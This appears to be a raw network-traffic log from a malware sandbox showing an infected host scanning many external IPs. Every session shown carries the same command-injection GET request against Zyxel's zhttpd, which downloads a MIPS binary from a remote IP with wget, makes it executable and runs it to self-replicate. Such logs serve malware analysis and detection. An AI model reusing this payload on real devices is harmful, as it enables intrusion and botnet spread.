                                                Jan 12, 2024 18:16:19.356489897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3442192.168.2.2339060207.192.92.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356542110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3443192.168.2.2356804223.140.80.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356576920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3444192.168.2.2345660222.24.22.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356605053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3445192.168.2.2350062192.79.44.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356672049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3446192.168.2.236085853.3.146.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356712103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3447192.168.2.2350610219.136.195.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356739998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3448192.168.2.234943068.159.87.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356779099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3449192.168.2.235777044.75.79.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356796980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3450192.168.2.2360178199.46.179.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356842995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3451192.168.2.233307094.85.221.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356900930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3452192.168.2.2337746182.16.135.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356945992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3453192.168.2.2333106155.102.5.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356992006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3454192.168.2.2350050150.26.82.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357019901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3455192.168.2.234266066.232.240.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357055902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3456192.168.2.2351642148.164.30.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357084036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3457192.168.2.2344674166.222.219.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357132912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3458192.168.2.2352588114.206.237.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357186079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3459192.168.2.2339090154.12.54.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357212067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3460192.168.2.235264048.29.183.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357248068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3461192.168.2.2334696188.100.174.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357295036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3462192.168.2.236003497.82.182.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357350111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3463192.168.2.234849666.219.137.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357379913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3464192.168.2.2348778131.23.60.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357423067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3465192.168.2.235104063.117.65.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357471943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3466192.168.2.2337452112.145.82.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357503891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3467192.168.2.233903485.185.164.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357532978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3468192.168.2.234173238.167.193.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357570887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3469192.168.2.235334841.164.188.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357599020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3470192.168.2.2345820107.190.205.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357656002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3471192.168.2.233444220.232.201.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357702971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3472192.168.2.2337648162.150.190.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357744932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3473192.168.2.23434484.125.42.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357785940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3474192.168.2.234362213.9.196.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357845068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3475192.168.2.2346492169.163.120.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357914925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3476192.168.2.2356494180.232.42.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357923031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3477192.168.2.235179213.108.175.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.357965946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3478192.168.2.2353146129.214.153.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358021021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3479192.168.2.2358908105.41.134.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358074903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3480192.168.2.2345962161.106.141.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358109951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3481192.168.2.233371691.148.191.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358160019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3482192.168.2.236040647.105.110.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358196974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3483192.168.2.2341240218.33.53.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358228922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3484192.168.2.235587678.0.189.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358274937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3485192.168.2.2349182174.161.58.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358314991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3486192.168.2.234501654.233.247.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358340025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3487192.168.2.233537451.173.86.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358392000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3488192.168.2.2358192119.132.155.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358428955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3489192.168.2.2337574101.60.235.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358473063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3490192.168.2.234991862.120.125.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358511925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3491192.168.2.2336122112.129.157.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358551025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3492192.168.2.235530095.89.200.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358586073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3493192.168.2.233880464.64.78.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358627081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3494192.168.2.234798819.125.31.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358655930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3495192.168.2.2345826154.74.74.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358678102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3496192.168.2.23495425.243.21.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358747959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3497192.168.2.2357918121.95.106.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358776093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3498192.168.2.233819470.239.28.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358823061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3499192.168.2.233846481.236.173.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358844042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3500192.168.2.2359192123.165.105.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358902931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3501192.168.2.233448674.118.184.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358939886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3502192.168.2.2342708115.229.240.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.358978987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3503192.168.2.2336160205.137.205.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359028101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3504192.168.2.2345180125.143.111.13443
                                                TimestampBytes transferredDirectionData
